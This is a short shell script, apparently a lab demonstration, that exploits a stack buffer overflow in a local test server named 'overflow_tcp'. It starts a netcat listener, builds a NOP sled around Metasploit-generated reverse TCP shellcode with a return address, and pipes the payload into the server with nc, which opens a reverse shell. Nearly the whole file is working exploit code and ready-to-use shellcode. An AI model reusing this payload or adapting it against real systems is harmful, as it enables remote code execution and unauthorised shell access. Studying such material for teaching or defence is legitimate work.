blob: aecfe2c10cf2d5379969ebe20a3a5f7e5f815330 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
#!/bin/sh
# shellcode generated with metasploit (reverse tcp shell; use netcat as tcp server):
# ./msfpayload linux/x86/shell_reverse_tcp PrependFork=true AppendExit=true LHOST=127.0.0.1 VERBOSE=true R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
# 260 --> 260 - 102 = 158 / 2 = 79
# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr
echo "starting netcat reverse tcp server .."
screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
sleep 1
echo "starting exploitable tcp server .."
./overflow_tcp &
sleep 1
host="127.0.0.1"
echo "connecting to $host .."
python -c 'print "\x90"*79 + \
"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \
"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \
"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \
"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \
"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \
"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \
"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \
"\x03\xa2\x22\x81" + \
"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000
read -p "[PRESS RETURN TO CONTINUE]"
screen -R overcat
|